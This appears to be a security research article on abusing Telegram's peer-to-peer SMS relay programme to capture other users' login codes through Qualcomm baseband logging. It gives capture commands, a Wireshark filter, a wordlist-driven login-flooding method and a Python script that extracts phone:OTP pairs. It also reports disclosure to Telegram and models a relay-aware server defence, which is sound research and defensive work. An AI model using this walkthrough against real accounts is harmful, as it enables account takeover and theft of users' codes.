In this article, I discuss software SMS relays for mobile applications, how they can be abused to steal other users' OTPs, and walk through a practical example with Telegram OTPs.
A One-Time Password (OTP) is a unique code that is valid for a short period and can only be used once to verify your identity when logging into an application or performing sensitive operations, such as making a purchase or changing your password.
The term “SMS relays” is often associated with GSM remote controllers, like the one shown in this picture:
SMS-440 SMS Control Relay
However, that kind of hardware relay is not the subject of this article. Instead, I will focus on software-based SMS relays. Companies sometimes struggle to deliver OTPs reliably and cost-effectively because of restrictions imposed by enterprise SMS operators in certain countries.
One way to get OTPs delivered to everyone is to use the phone numbers (devices) of some users as relays that forward OTPs to other users. The recipient then sees the message arriving from an ordinary phone number, which is in fact the number of the relaying user's device. Companies like LinkedIn and Telegram use this approach; Telegram's version is its Peer-to-Peer Login (P2PL) program.
Below is a simple diagram explaining how P2PL works in Telegram.
When Telegram first announced the Peer-to-Peer Login (P2PL) program, many people criticized it as a privacy violation: the relay member's phone number appears as the sender of the OTP SMS, so it is exposed to every recipient.
Another significant issue that received far less attention is that the feature could be abused to steal OTPs and take over user accounts.
How could that be done? One option is to capture the GSM traffic while the device is relaying the OTP to its destination. This is hard in practice because the air interface between the phone and the base station is encrypted (with the A5 family of ciphers on GSM), so a capture made with a Software-Defined Radio (SDR) yields ciphertext that cannot be read without first breaking the cipher.
For more information about cracking GSM traffic, check out this video.
Fortunately, phones and dongles built on Qualcomm chipsets expose a diagnostic interface, the Diag protocol (also called Diagnostic Monitor, DM). It talks directly to the device's baseband and lets us log raw mobile-network signalling for the various protocol layers as the baseband sees it, i.e. uplink messages before they are encrypted for the air interface and downlink messages after they have been decrypted.
A tool for this purpose is QCSuper by P1 Security. The setup is a PC running QCSuper and Wireshark, ADB, and a rooted Android phone with a Qualcomm chipset and USB debugging enabled in the developer options. The tool is more stable on older Android phones; for this experiment I used a Samsung Galaxy S4.
For more information about reading and analyzing packet captures of various mobile network protocols with Wireshark, check out this article.
Now to the Telegram experiment. To perform the attack we first enrol in the P2PL program, after which the app shows a screen similar to this:
By doing so, you grant the Telegram app permission to send SMS and allow it to use your device as an SMS relay in exchange for a Telegram Premium subscription.
The next step is to start QCSuper with the setup described earlier and then initiate logins for many valid Telegram accounts, taking the phone numbers from a wordlist. Telegram's web app or any of the Telegram login APIs will do. Each login attempt makes Telegram send an OTP to the targeted number, and the more attempts we make, the greater the chance that one of those OTPs is relayed through our device.
This only works in a country where Telegram had to enable P2PL because of SMS delivery problems, and where there are few P2PL members, so that the odds of our device being chosen as the relay are high.
If we are lucky enough, we will see the OTP appearing in Wireshark as follows:
We are interested in the GSM SMS protocol packets, and specifically those whose TPDU (Transfer Protocol Data Unit) has message type SMS-SUBMIT (TP-MTI = 01 in the mobile-to-network direction), which restricts the view to SMS messages sent from the device. The TPDU format is defined in 3GPP TS 23.040 independently of the radio generation, so the same dissector applies whether the SMS is carried over 2G, 3G or 4G.
You can use the following Wireshark display filter:

gsm_sms.tp-mti == 1

In the packet details, the fields of interest are TP-Destination-Address, which holds the number of the target user (the OTP's final recipient), and TP-User-Data, which holds the SMS text. To automate the retrieval, a command-line analyzer such as tshark can print just those two fields, which lets you save phone:OTP pairs to a file and then use that file to submit the OTPs.
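As an added example (not code from the article), here is how that phone:OTP extraction step can be automated in Python over the output of such a tshark command. The qcsuper and tshark invocations in the comments, the Wireshark field names and the shape of the OTP message are assumptions; the sample input is constructed.

```python
import re
from typing import Dict, List, Tuple

# Assumed capture and export pipeline (commands are not from the article):
#   ./qcsuper.py --adb --pcap-dump relay.pcap
#   tshark -r relay.pcap -Y 'gsm_sms.tp-mti == 1' -T fields \
#          -e gsm_sms.tp-da -e gsm_sms.sms_text > submits.tsv
# Field names follow Wireshark's gsm_sms dissector; confirm them on your
# version with:  tshark -G fields | grep gsm_sms

# Constructed sample of that tshark output: one SMS-SUBMIT per line,
# tab-separated TP-Destination-Address and decoded TP-User-Data.
# Numbers and codes are made up.
SAMPLE_TSHARK_OUTPUT = (
    "+15550100001\tYour login code: 83921. Do not share it.\n"
    "+15550100002\tHi, are we still on for lunch?\n"
    "+15550100001\tYour login code: 83921. Do not share it.\n"
    "+15550100003\tCode 47105 expires in 5 minutes\n"
)

# Assumed OTP shape: a standalone run of 5 to 8 digits in the message body.
OTP_RE = re.compile(r"\b(\d{5,8})\b")


def parse_tshark_fields(text: str) -> List[Tuple[str, str]]:
    """Turn tshark `-T fields` output into (destination, body) tuples.

    tshark prints one packet per line with fields separated by a tab and
    leaves a field empty when the packet lacks it; such lines are skipped.
    """
    rows: List[Tuple[str, str]] = []
    for line in text.splitlines():
        parts = line.split("\t", 1)
        if len(parts) != 2 or not parts[0] or not parts[1]:
            continue
        rows.append((parts[0].strip(), parts[1].strip()))
    return rows


def extract_otps(rows: List[Tuple[str, str]]) -> Dict[str, str]:
    """Map destination number -> OTP for bodies that contain a code.

    A code relayed twice (e.g. a retry) collapses onto one entry; bodies
    with no digit run of OTP length are ignored.
    """
    found: Dict[str, str] = {}
    for dest, body in rows:
        match = OTP_RE.search(body)
        if match:
            found[dest] = match.group(1)
    return found


def format_phone_otp(found: Dict[str, str]) -> str:
    """Render phone:OTP lines, one per recipient, in a stable order."""
    return "\n".join(f"{dest}:{otp}" for dest, otp in sorted(found.items()))


if __name__ == "__main__":
    pairs = extract_otps(parse_tshark_fields(SAMPLE_TSHARK_OUTPUT))
    print(format_phone_otp(pairs))
```

On a real capture, replace SAMPLE_TSHARK_OUTPUT with the contents of submits.tsv; the regular expression is the part most likely to need adjusting to the actual wording of the OTP message.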
After I emailed Telegram's security team about this, they replied, in part:
"although a P2PL member can have other users' OTPs, they or anyone else except the initial user won't be able to use them due to specific server-side restrictions."
Telegram did not say what those restrictions are; they may be an IP or device-fingerprinting check that ties the code to the user who is expected to submit it.
Without such restrictions, this approach could be used to steal OTPs and gain unauthorized access to accounts. Any software that delivers OTPs through user-operated SMS relays should enforce comparable server-side checks, for example refusing a code when it is submitted from the same device, account or network that relayed it, and should treat client-side measures such as root detection only as an extra hurdle: root detection runs inside the app on the attacker's own phone and can be bypassed, whereas a server-side check cannot.
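The following is an added example, not Telegram's code: the article only reports that unspecified server-side restrictions exist and guesses at IP or device fingerprinting, so this models that guess. A weak OTP server that accepts any phone-plus-code submission is placed beside a relay-aware one that never routes a code through a device matching the requester, rejects a code submitted from the device that relayed it, and makes codes single-use, time-limited and guess-limited. All names, limits and fingerprints are hypothetical.

```python
import hmac
import random
import secrets
from dataclasses import dataclass
from typing import Dict, List

OTP_TTL_SECONDS = 120   # assumed lifetime of a login code
MAX_ATTEMPTS = 5        # assumed guess budget per code


@dataclass
class Relay:
    member_id: str      # account enrolled in the relay programme (hypothetical)
    fingerprint: str    # device/IP fingerprint the server holds for it (hypothetical)


@dataclass
class PendingCode:
    code: str
    relay: Relay        # which member's device carried the SMS
    issued_at: float
    attempts: int = 0
    used: bool = False


class WeakOtpServer:
    """Accepts any submission of phone + code. A relay member who read the code
    out of the SMS-SUBMIT leaving their baseband can log in as the victim."""

    def __init__(self, relays: List[Relay], seed: int = 0):
        self.relays = relays
        self.rng = random.Random(seed)   # seeded only to keep the demo deterministic
        self.pending: Dict[str, PendingCode] = {}

    def choose_relay(self, requester_fp: str) -> Relay:
        return self.rng.choice(self.relays)

    def request_code(self, phone: str, requester_fp: str, now: float) -> PendingCode:
        code = f"{secrets.randbelow(100000):05d}"
        p = PendingCode(code, self.choose_relay(requester_fp), now)
        self.pending[phone] = p
        return p   # the server would now push p.code to p.relay for delivery

    def verify(self, phone: str, code: str, submitter_fp: str, now: float) -> bool:
        p = self.pending.get(phone)
        return p is not None and hmac.compare_digest(p.code, code)


class RelayAwareOtpServer(WeakOtpServer):
    """Never routes a code through a device matching the requester, refuses a
    code submitted from the device that relayed it, and makes every code
    single-use, time-limited and guess-limited."""

    def choose_relay(self, requester_fp: str) -> Relay:
        candidates = [r for r in self.relays if r.fingerprint != requester_fp]
        if not candidates:
            raise RuntimeError("no relay independent of the requester available")
        return self.rng.choice(candidates)

    def verify(self, phone: str, code: str, submitter_fp: str, now: float) -> bool:
        p = self.pending.get(phone)
        if p is None or p.used or now - p.issued_at > OTP_TTL_SECONDS:
            self.pending.pop(phone, None)
            return False
        p.attempts += 1
        if p.attempts > MAX_ATTEMPTS:
            del self.pending[phone]
            return False
        # The party submitting the code must not be the party that relayed it.
        if submitter_fp == p.relay.fingerprint:
            return False
        ok = hmac.compare_digest(p.code, code)
        if ok:
            p.used = True
        return ok


def relay_attack_succeeds(server_cls) -> bool:
    """Replay the article's scenario: the attacker's phone is one of two relays,
    the attacker requests logins for the victim's number from that same device
    until the server routes the code through it (what the phone-number wordlist
    achieves at scale), reads the code from the captured SMS-SUBMIT and submits it."""
    attacker = Relay("acct-attacker", "fp-attacker")
    honest = Relay("acct-honest", "fp-honest")
    server = server_cls([attacker, honest])
    victim = "+15550100001"
    for _ in range(64):
        p = server.request_code(victim, "fp-attacker", now=1000.0)
        if p.relay is attacker:
            return server.verify(victim, p.code, "fp-attacker", now=1001.0)
    return False   # the server never handed the attacker's device a code
```

The fingerprint comparison is only as strong as the attacker's inability to separate the two roles: issuing the login requests from a different network or device than the relay phone defeats it, so it should be one layer alongside per-source rate limiting of code requests and monitoring of relay members whose relayed numbers are disproportionately logged in from elsewhere.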
I also find that QCSuper is a valuable tool for mobile pentesting and security research, because it captures raw baseband traffic that is otherwise invisible from the application layer. Mobile pentesters should definitely include it in their toolkit.